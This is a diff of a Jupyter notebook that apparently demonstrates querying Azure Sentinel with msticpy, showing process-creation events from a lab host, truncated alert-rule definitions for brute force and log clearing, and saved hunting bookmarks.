+       "      <td>Defrag.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\Defrag.exe</td>\n",
+       "      <td>C:\\windows\\system32\\defrag.exe -c -h -k -g -$</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-21 21:18:51.317000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2020-11-23 01:31:49.930000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>0.001074</td>\n",
+       "      <td>SppExtComObj.Exe</td>\n",
+       "      <td>C:\\Windows\\System32\\SppExtComObj.Exe</td>\n",
+       "      <td>C:\\windows\\system32\\SppExtComObj.exe -Embedding</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-23 01:31:49.930000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2020-11-20 17:18:36.960000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>0.001074</td>\n",
+       "      <td>makecab.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\makecab.exe</td>\n",
+       "      <td>\"C:\\windows\\system32\\makecab.exe\" C:\\windows\\L...</td>\n",
+       "      <td>C:\\Windows\\WinSxS\\amd64_microsoft-windows-serv...</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-20 17:18:36.960000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2020-11-21 21:18:51.303000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>0.001074</td>\n",
+       "      <td>rundll32.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\rundll32.exe</td>\n",
+       "      <td>C:\\windows\\system32\\rundll32.exe Windows.Stora...</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-21 21:18:51.303000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2020-11-21 21:18:51.310000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>0.001074</td>\n",
+       "      <td>tzsync.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\tzsync.exe</td>\n",
+       "      <td>C:\\windows\\system32\\tzsync.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-21 21:18:51.310000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>2020-11-18 01:18:36.913000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>39.820861</td>\n",
+       "      <td>19.910430</td>\n",
+       "      <td>0.001991</td>\n",
+       "      <td>lpremove.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\lpremove.exe</td>\n",
+       "      <td>C:\\windows\\system32\\lpremove.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>2</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-18 01:18:36.913000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>2020-11-21 03:18:49.223000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>39.820861</td>\n",
+       "      <td>19.910430</td>\n",
+       "      <td>0.001991</td>\n",
+       "      <td>lpremove.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\lpremove.exe</td>\n",
+       "      <td>C:\\windows\\system32\\lpremove.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>2</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-21 03:18:49.223000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>2020-11-23 01:31:49.957000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-20</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>39.820861</td>\n",
+       "      <td>19.910430</td>\n",
+       "      <td>0.001991</td>\n",
+       "      <td>slui.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\slui.exe</td>\n",
+       "      <td>\"C:\\windows\\System32\\SLUI.exe\" RuleId=502ff3ba...</td>\n",
+       "      <td>C:\\Windows\\System32\\SppExtComObj.Exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>2</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-23 01:31:49.957000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>2020-11-23 01:31:54.340000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-20</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>39.820861</td>\n",
+       "      <td>19.910430</td>\n",
+       "      <td>0.001991</td>\n",
+       "      <td>slui.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\slui.exe</td>\n",
+       "      <td>\"C:\\windows\\System32\\SLUI.exe\" RuleId=379cccfb...</td>\n",
+       "      <td>C:\\Windows\\System32\\SppExtComObj.Exe</td>\n",
+       "      <td>12688</td>\n",
+       "      <td>2</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-11-23 01:31:54.340000+00:00</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                     TimeGenerated  EventID      Computer SubjectUserSid  \\\n",
+       "0 2020-11-21 21:18:51.317000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "1 2020-11-23 01:31:49.930000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "2 2020-11-20 17:18:36.960000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "3 2020-11-21 21:18:51.303000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "4 2020-11-21 21:18:51.310000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "5 2020-11-18 01:18:36.913000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "6 2020-11-21 03:18:49.223000+00:00     4688  WinAttackSim       S-1-5-18   \n",
+       "7 2020-11-23 01:31:49.957000+00:00     4688  WinAttackSim       S-1-5-20   \n",
+       "8 2020-11-23 01:31:54.340000+00:00     4688  WinAttackSim       S-1-5-20   \n",
+       "\n",
+       "                   Account     Weight  AdjustedProcessEntropy  \\\n",
+       "0  WORKGROUP\\WinAttackSim$  10.743361               10.743361   \n",
+       "1  WORKGROUP\\WinAttackSim$  10.743361               10.743361   \n",
+       "2  WORKGROUP\\WinAttackSim$  10.743361               10.743361   \n",
+       "3  WORKGROUP\\WinAttackSim$  10.743361               10.743361   \n",
+       "4  WORKGROUP\\WinAttackSim$  10.743361               10.743361   \n",
+       "5  WORKGROUP\\WinAttackSim$  39.820861               19.910430   \n",
+       "6  WORKGROUP\\WinAttackSim$  39.820861               19.910430   \n",
+       "7  WORKGROUP\\WinAttackSim$  39.820861               19.910430   \n",
+       "8  WORKGROUP\\WinAttackSim$  39.820861               19.910430   \n",
+       "\n",
+       "   FullDecimalProcessEntropy           Process  \\\n",
+       "0                   0.001074        Defrag.exe   \n",
+       "1                   0.001074  SppExtComObj.Exe   \n",
+       "2                   0.001074       makecab.exe   \n",
+       "3                   0.001074      rundll32.exe   \n",
+       "4                   0.001074        tzsync.exe   \n",
+       "5                   0.001991      lpremove.exe   \n",
+       "6                   0.001991      lpremove.exe   \n",
+       "7                   0.001991          slui.exe   \n",
+       "8                   0.001991          slui.exe   \n",
+       "\n",
+       "                         NewProcessName  \\\n",
+       "0        C:\\Windows\\System32\\Defrag.exe   \n",
+       "1  C:\\Windows\\System32\\SppExtComObj.Exe   \n",
+       "2       C:\\Windows\\System32\\makecab.exe   \n",
+       "3      C:\\Windows\\System32\\rundll32.exe   \n",
+       "4        C:\\Windows\\System32\\tzsync.exe   \n",
+       "5      C:\\Windows\\System32\\lpremove.exe   \n",
+       "6      C:\\Windows\\System32\\lpremove.exe   \n",
+       "7          C:\\Windows\\System32\\slui.exe   \n",
+       "8          C:\\Windows\\System32\\slui.exe   \n",
+       "\n",
+       "                                         CommandLine  \\\n",
+       "0      C:\\windows\\system32\\defrag.exe -c -h -k -g -$   \n",
+       "1    C:\\windows\\system32\\SppExtComObj.exe -Embedding   \n",
+       "2  \"C:\\windows\\system32\\makecab.exe\" C:\\windows\\L...   \n",
+       "3  C:\\windows\\system32\\rundll32.exe Windows.Stora...   \n",
+       "4                     C:\\windows\\system32\\tzsync.exe   \n",
+       "5                   C:\\windows\\system32\\lpremove.exe   \n",
+       "6                   C:\\windows\\system32\\lpremove.exe   \n",
+       "7  \"C:\\windows\\System32\\SLUI.exe\" RuleId=502ff3ba...   \n",
+       "8  \"C:\\windows\\System32\\SLUI.exe\" RuleId=379cccfb...   \n",
+       "\n",
+       "                                   ParentProcessName  TotalProcessCountOnHost  \\\n",
+       "0                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "1                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "2  C:\\Windows\\WinSxS\\amd64_microsoft-windows-serv...                    12688   \n",
+       "3                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "4                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "5                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "6                    C:\\Windows\\System32\\svchost.exe                    12688   \n",
+       "7               C:\\Windows\\System32\\SppExtComObj.Exe                    12688   \n",
+       "8               C:\\Windows\\System32\\SppExtComObj.Exe                    12688   \n",
+       "\n",
+       "   ProcessCountOnHost  DistinctComputersWithProcessCount  \\\n",
+       "0                   1                                  1   \n",
+       "1                   1                                  1   \n",
+       "2                   1                                  1   \n",
+       "3                   1                                  1   \n",
+       "4                   1                                  1   \n",
+       "5                   2                                  1   \n",
+       "6                   2                                  1   \n",
+       "7                   2                                  1   \n",
+       "8                   2                                  1   \n",
+       "\n",
+       "                         timestamp HostCustomEntity      AccountCustomEntity  \n",
+       "0 2020-11-21 21:18:51.317000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "1 2020-11-23 01:31:49.930000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "2 2020-11-20 17:18:36.960000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "3 2020-11-21 21:18:51.303000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "4 2020-11-21 21:18:51.310000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "5 2020-11-18 01:18:36.913000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "6 2020-11-21 03:18:49.223000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "7 2020-11-23 01:31:49.957000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  \n",
+       "8 2020-11-23 01:31:54.340000+00:00     WinAttackSim  WORKGROUP\\WinAttackSim$  "
+      ]
+     },
+     "execution_count": 13,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "from msticpy.common.wsconfig import WorkspaceConfig\n",
+    "qry_prov = QueryProvider('LogAnalytics')\n",
+    "wkspace = WorkspaceConfig()\n",
+    "qry_prov.connect(wkspace.code_connect_str)\n",
+    "qry_prov.exec_query(queries['properties.Query'].iloc[2])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also get a list of configured alert rules:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T00:50:07.155005Z",
+     "start_time": "2020-10-28T00:50:06.191005Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>type</th>\n",
+       "      <th>kind</th>\n",
+       "      <th>properties.severity</th>\n",
+       "      <th>properties.query</th>\n",
+       "      <th>properties.queryFrequency</th>\n",
+       "      <th>properties.queryPeriod</th>\n",
+       "      <th>properties.triggerOperator</th>\n",
+       "      <th>properties.triggerThreshold</th>\n",
+       "      <th>properties.suppressionDuration</th>\n",
+       "      <th>properties.suppressionEnabled</th>\n",
+       "      <th>...</th>\n",
+       "      <th>properties.description</th>\n",
+       "      <th>properties.tactics</th>\n",
+       "      <th>properties.alertRuleTemplateName</th>\n",
+       "      <th>properties.lastModifiedUtc</th>\n",
+       "      <th>properties.customFields.Filename</th>\n",
+       "      <th>properties.customFields.Reason</th>\n",
+       "      <th>properties.productFilter</th>\n",
+       "      <th>properties.severitiesFilter</th>\n",
+       "      <th>properties.displayNamesFilter</th>\n",
+       "      <th>properties.displayNamesExcludeFilter</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>Microsoft.SecurityInsights/alertRules</td>\n",
+       "      <td>Scheduled</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>let failureCountThreshold = 5;\\nlet successCou...</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>GreaterThan</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>PT5H</td>\n",
+       "      <td>False</td>\n",
+       "      <td>...</td>\n",
+       "      <td>Identifies evidence of brute force activity ag...</td>\n",
+       "      <td>[CredentialAccess]</td>\n",
+       "      <td>28b42356-45af-40a6-a0b4-a554cdfd5d8a</td>\n",
+       "      <td>2020-11-17T08:15:49.636781Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>Microsoft.SecurityInsights/alertRules</td>\n",
+       "      <td>Scheduled</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>let timeframe = 1d;\\n//Set a threshold of fail...</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>GreaterThan</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>PT5H</td>\n",
+       "      <td>False</td>\n",
+       "      <td>...</td>\n",
+       "      <td>This query creates a list of IP addresses with...</td>\n",
+       "      <td>[InitialAccess, CredentialAccess]</td>\n",
+       "      <td>ba144bf8-75b8-406f-9420-ed74397f9479</td>\n",
+       "      <td>2020-11-11T05:16:14.5036485Z</td>\n",
+       "      <td>FileName</td>\n",
+       "      <td>Reason</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>Microsoft.SecurityInsights/alertRules</td>\n",
+       "      <td>Scheduled</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>let timeframe = 1d;\\nSecurityEvent\\n| where Ti...</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>GreaterThan</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>PT5H</td>\n",
+       "      <td>False</td>\n",
+       "      <td>...</td>\n",
+       "      <td>Checks for event id 1102 which indicates the s...</td>\n",
+       "      <td>[DefenseEvasion]</td>\n",
+       "      <td>80da0a8f-cfe1-4cd0-a895-8bc1771a720e</td>\n",
+       "      <td>2020-11-11T01:46:53.4905768Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>Microsoft.SecurityInsights/alertRules</td>\n",
+       "      <td>Scheduled</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>AzureActivity\\n| take 1\\n| extend IPCustomEnti...</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>P14D</td>\n",
+       "      <td>GreaterThan</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>PT5H</td>\n",
+       "      <td>False</td>\n",
+       "      <td>...</td>\n",
+       "      <td>This analytic matches Azure Activity logs to k...</td>\n",
+       "      <td>[Impact]</td>\n",
+       "      <td>None</td>\n",
+       "      <td>2020-11-04T22:43:33.9845152Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>Microsoft.SecurityInsights/alertRules</td>\n",
+       "      <td>Scheduled</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>let timeframe = 1d;\\nSecurityEvent\\n| where Ti...</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>P1D</td>\n",
+       "      <td>GreaterThan</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>PT5H</td>\n",
+       "      <td>False</td>\n",
+       "      <td>...</td>\n",
+       "      <td>Checks for event id 1102 which indicates the s...</td>\n",
+       "      <td>[DefenseEvasion]</td>\n",
+       "      <td>80da0a8f-cfe1-4cd0-a895-8bc1771a720e</td>\n",
+       "      <td>2020-11-11T07:19:24.7658031Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 29 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                    type       kind properties.severity  \\\n",
+       "0  Microsoft.SecurityInsights/alertRules  Scheduled              Medium   \n",
+       "1  Microsoft.SecurityInsights/alertRules  Scheduled              Medium   \n",
+       "2  Microsoft.SecurityInsights/alertRules  Scheduled              Medium   \n",
+       "3  Microsoft.SecurityInsights/alertRules  Scheduled              Medium   \n",
+       "4  Microsoft.SecurityInsights/alertRules  Scheduled              Medium   \n",
+       "\n",
+       "                                    properties.query  \\\n",
+       "0  let failureCountThreshold = 5;\\nlet successCou...   \n",
+       "1  let timeframe = 1d;\\n//Set a threshold of fail...   \n",
+       "2  let timeframe = 1d;\\nSecurityEvent\\n| where Ti...   \n",
+       "3  AzureActivity\\n| take 1\\n| extend IPCustomEnti...   \n",
+       "4  let timeframe = 1d;\\nSecurityEvent\\n| where Ti...   \n",
+       "\n",
+       "  properties.queryFrequency properties.queryPeriod properties.triggerOperator  \\\n",
+       "0                       P1D                    P1D                GreaterThan   \n",
+       "1                       P1D                    P1D                GreaterThan   \n",
+       "2                       P1D                    P1D                GreaterThan   \n",
+       "3                       P1D                   P14D                GreaterThan   \n",
+       "4                       P1D                    P1D                GreaterThan   \n",
+       "\n",
+       "   properties.triggerThreshold properties.suppressionDuration  \\\n",
+       "0                          0.0                           PT5H   \n",
+       "1                          0.0                           PT5H   \n",
+       "2                          0.0                           PT5H   \n",
+       "3                          0.0                           PT5H   \n",
+       "4                          0.0                           PT5H   \n",
+       "\n",
+       "  properties.suppressionEnabled  ...  \\\n",
+       "0                         False  ...   \n",
+       "1                         False  ...   \n",
+       "2                         False  ...   \n",
+       "3                         False  ...   \n",
+       "4                         False  ...   \n",
+       "\n",
+       "                              properties.description  \\\n",
+       "0  Identifies evidence of brute force activity ag...   \n",
+       "1  This query creates a list of IP addresses with...   \n",
+       "2  Checks for event id 1102 which indicates the s...   \n",
+       "3  This analytic matches Azure Activity logs to k...   \n",
+       "4  Checks for event id 1102 which indicates the s...   \n",
+       "\n",
+       "                  properties.tactics      properties.alertRuleTemplateName  \\\n",
+       "0                 [CredentialAccess]  28b42356-45af-40a6-a0b4-a554cdfd5d8a   \n",
+       "1  [InitialAccess, CredentialAccess]  ba144bf8-75b8-406f-9420-ed74397f9479   \n",
+       "2                   [DefenseEvasion]  80da0a8f-cfe1-4cd0-a895-8bc1771a720e   \n",
+       "3                           [Impact]                                  None   \n",
+       "4                   [DefenseEvasion]  80da0a8f-cfe1-4cd0-a895-8bc1771a720e   \n",
+       "\n",
+       "     properties.lastModifiedUtc properties.customFields.Filename  \\\n",
+       "0   2020-11-17T08:15:49.636781Z                              NaN   \n",
+       "1  2020-11-11T05:16:14.5036485Z                         FileName   \n",
+       "2  2020-11-11T01:46:53.4905768Z                              NaN   \n",
+       "3  2020-11-04T22:43:33.9845152Z                              NaN   \n",
+       "4  2020-11-11T07:19:24.7658031Z                              NaN   \n",
+       "\n",
+       "  properties.customFields.Reason properties.productFilter  \\\n",
+       "0                            NaN                      NaN   \n",
+       "1                         Reason                      NaN   \n",
+       "2                            NaN                      NaN   \n",
+       "3                            NaN                      NaN   \n",
+       "4                            NaN                      NaN   \n",
+       "\n",
+       "  properties.severitiesFilter  properties.displayNamesFilter  \\\n",
+       "0                         NaN                            NaN   \n",
+       "1                         NaN                            NaN   \n",
+       "2                         NaN                            NaN   \n",
+       "3                         NaN                            NaN   \n",
+       "4                         NaN                            NaN   \n",
+       "\n",
+       "  properties.displayNamesExcludeFilter  \n",
+       "0                                  NaN  \n",
+       "1                                  NaN  \n",
+       "2                                  NaN  \n",
+       "3                                  NaN  \n",
+       "4                                  NaN  \n",
+       "\n",
+       "[5 rows x 29 columns]"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "alert_rules = azs.get_alert_rules(ws.value)\n",
+    "alert_rules.head().drop(columns=[\"id\", \"etag\", \"name\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also get a list of saved bookmarks. To see the events these bookmarks relate to you can pass the query value to a QueryProvider."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T00:50:17.332381Z",
+     "start_time": "2020-10-28T00:50:14.780804Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>type</th>\n",
+       "      <th>properties.displayName</th>\n",
+       "      <th>properties.created</th>\n",
+       "      <th>properties.updated</th>\n",
+       "      <th>properties.createdBy.objectId</th>\n",
+       "      <th>properties.createdBy.email</th>\n",
+       "      <th>properties.createdBy.name</th>\n",
+       "      <th>properties.updatedBy.objectId</th>\n",
+       "      <th>properties.updatedBy.email</th>\n",
+       "      <th>properties.updatedBy.name</th>\n",
+       "      <th>...</th>\n",
+       "      <th>properties.labels</th>\n",
+       "      <th>properties.query</th>\n",
+       "      <th>properties.queryResult</th>\n",
+       "      <th>properties.queryStartTime</th>\n",
+       "      <th>properties.queryEndTime</th>\n",
+       "      <th>properties.incidentInfo.incidentId</th>\n",
+       "      <th>properties.incidentInfo.title</th>\n",
+       "      <th>properties.incidentInfo.relationName</th>\n",
+       "      <th>properties.incidentInfo.severity</th>\n",
+       "      <th>properties.notes</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>Microsoft.SecurityInsights/Bookmarks</td>\n",
+       "      <td>mercury IP</td>\n",
+       "      <td>2020-11-18T09:26:54.1605891+00:00</td>\n",
+       "      <td>2020-11-18T09:26:54.1605891+00:00</td>\n",
+       "      <td>e0139aae-7811-40ca-abc6-3fcb79140a6b</td>\n",
+       "      <td>Tim.Burrell@microsoft.com</td>\n",
+       "      <td>Tim Burrell (MSTIC)</td>\n",
+       "      <td>e0139aae-7811-40ca-abc6-3fcb79140a6b</td>\n",
+       "      <td>Tim.Burrell@microsoft.com</td>\n",
+       "      <td>Tim Burrell (MSTIC)</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>print \"192.168.15.6\" \\n</td>\n",
+       "      <td>{\"print_0\":\"192.168.15.6\",\"__entityMapping\":{\"...</td>\n",
+       "      <td>2020-11-17T09:26:33.557+00:00</td>\n",
+       "      <td>2020-11-18T09:26:33.557+00:00</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>Microsoft.SecurityInsights/Bookmarks</td>\n",
+       "      <td>test 1</td>\n",
+       "      <td>2020-11-18T15:25:01.1843361+00:00</td>\n",
+       "      <td>2020-11-18T15:25:01.1843361+00:00</td>\n",
+       "      <td>b3a76793-1a0d-4bfe-95f6-96919d4b9acf</td>\n",
+       "      <td>bnick@microsoft.com</td>\n",
+       "      <td>Ben Nick</td>\n",
+       "      <td>b3a76793-1a0d-4bfe-95f6-96919d4b9acf</td>\n",
+       "      <td>bnick@microsoft.com</td>\n",
+       "      <td>Ben Nick</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[fluffyDogCampaign]</td>\n",
+       "      <td>let auditLookback = 14d;\\n// Setting threshold...</td>\n",
+       "      <td>{\"InitiatedBy\":\"seb@seccxp.ninja\",\"IpAddress\":...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>this looks suspicious</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>Microsoft.SecurityInsights/Bookmarks</td>\n",
+       "      <td>failed logons - decb171c8160 (1)</td>\n",
+       "      <td>2020-11-19T11:26:31.3053573+00:00</td>\n",
+       "      <td>2020-11-19T11:26:31.3053573+00:00</td>\n",
